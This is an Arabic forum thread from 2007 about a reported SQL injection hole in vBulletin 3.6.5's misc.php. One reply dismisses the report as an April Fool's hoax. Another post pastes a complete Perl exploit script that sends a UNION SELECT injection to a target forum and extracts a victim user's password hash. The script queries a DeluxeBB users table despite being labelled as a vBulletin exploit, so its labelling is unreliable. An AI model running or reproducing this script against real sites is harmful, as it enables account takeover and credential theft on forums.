النتائج 1 إلى 6 من 6

الموضوع: ثغرة خطيره في منتديات vBulletin الإصدار 3.6.5 تحذير !!!!!

  1. #1
    عضو نشيط جدا
    تاريخ التسجيل
    Oct 2005
    المشاركات
    339

    ثغرة خطيره في منتديات vBulletin الإصدار 3.6.5 تحذير !!!!!



    السلام عليكم ورحمة الله وبركاته اخواني في منتديات سوالف

    جت لي رساله من احد الأخوان الله يجزاه كل خير فيها التالي وأرسلها لي أمس
    تاريخ الثغره 13 /4 / 2007 __ أمس __
    :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ثغره في منتديات vBulletin الاصدر 3.6.5 نوع الثغره SQl Injection

    الملف المصاب misc.php .......

    :looking:
    :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

    أرجو من الأخوان بسوالف وأخص بالذات الأستاذ القدير العندليب أن يوفر لنا حل مشكورا

    الثغره نشرة على موقع http://www.securityfocus.com

    رابط الثغره
    http://www.securityfocus.com/archive.../30/0/threaded





    __________________
    شـــكراَ سوالف ســـوفت ,,, قمة المواقع العربية بلا منازع

    --|| سبحان الله والحمد لله والله أكـبر ||--


  2. #2
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2003
    المشاركات
    2,307


    قمت بمراسلة الشركة و سأنتظر الرد منهم






  3. #3


    السلام عليكم ورحمة الله وبركاته

    في البدايه أشكرك على النقل والتنبيه والسؤال

    والثغره ليس لها أي أساس من الصحه فتطمن فهذه كذبة إبريل.

    موفق





    __________________
    al3ndaleeb[@]uk2.net

  4. #4
    عضو نشيط جدا
    تاريخ التسجيل
    Oct 2005
    المشاركات
    339


    الله يريحك يا العندليب وأشكرك جزيل الشكر على الإفادة والله يكثر من امثالك

    دمت برعاية الله





    __________________
    شـــكراَ سوالف ســـوفت ,,, قمة المواقع العربية بلا منازع

    --|| سبحان الله والحمد لله والله أكـبر ||--

  5. #5
    عضو فعال
    تاريخ التسجيل
    Sep 2006
    المشاركات
    1,619


    الأكسبلويت مكتوب بلغه الـ P3rl . . .

    #!/usr/bin/perl

    use IO::Socket;

    print q{
    ######################################################
    # DeluxeBB Remote SQL Injection Exploit #
    # vbulletin Remote SQL Injection Exploit #
    # // SekoMirza // Turkish Hackerz #
    ######################################################
    };

    if (!$ARGV[2]) {

    print q{
    Usage: perl dbbxpl.pl host /directory/ victim_userid

    perl dbbxpl.pl www.somesite.com /forum/ 1

    };

    }

    $server = $ARGV[0];
    $dir = $ARGV[1];
    $user = $ARGV[2];
    $myuser = $ARGV[3];
    $mypass = $ARGV[4];
    $myid = $ARGV[5];

    print "-----------------------------------------------------------------------
    -------------------------\r\n";
    print "[>] SERVER: $server\r\n";
    print "[>] DIR: $dir\r\n";
    print "[>] USERID: $user\r\n";
    print "-----------------------------------------------------------------------
    -------------------------\r\n\r\n";

    $server =~ s/(http:\/\/)//eg;

    $path = $dir;
    $path .=

    "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
    ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

    20WHERE%20(uid='".$user ;

    print "[~] PREPARE TO CONNECT...\r\n";

    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

    print "[+] CONNECTED\r\n";
    print "[~] SENDING QUERY...\r\n";
    print $socket "GET $path HTTP/1.1\r\n";
    print $socket "Host: $server\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";
    print "[+] DONE!\r\n\r\n";

    print "--[ REPORT ]-----------------------------------------------------------------------
    -------------\r\n";
    while ($answer = <$socket>)
    {

    if ($answer =~/(\w{32})/)
    {

    if ($1 ne 0) {
    print "Password Hash is: ".$1."\r\n";
    print "-----------------------------------------------------------------------
    ---------------\r\n";

    }
    exit();
    }

    }
    print "-----------------------------------------------------------------------
    -------------------------\r\n";

    #########################################################
    #Shoutz: #
    # #
    # My Sweet -> Caramel #
    # For Mp3s -> Hypn0sis #
    # For Support -> [WwW.StarHack.Org] #
    # My Bro -> PhantomOrchid #
    # My Preceptor -> Earnk Kazno #
    #########################################################
    الله يستــر , ,





    __________________
    لا إله الا الله .. سبحانك إني كنت من الظالمين
    سبحانك الله و بحمدك .. سبحان الله العظيم ...!!

  6. #6
    مُجَاهِد سابقاً
    تاريخ التسجيل
    Apr 2004
    المشاركات
    12,000


    اقتباس المشاركة الأصلية كتبت بواسطة العندليب
    السلام عليكم ورحمة الله وبركاته

    في البدايه أشكرك على النقل والتنبيه والسؤال

    والثغره ليس لها أي أساس من الصحه فتطمن فهذه كذبة إبريل.

    موفق
    معقوووول .!!!





    __________________
    استخدم خاصية تنبيه المشرفين للضرورة وعند ملاحظة موضوع يخالف قوانين منتديات سوالف وسيتم مراجعة الموضوع او المشاركة المبلغ عنها على الفور





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض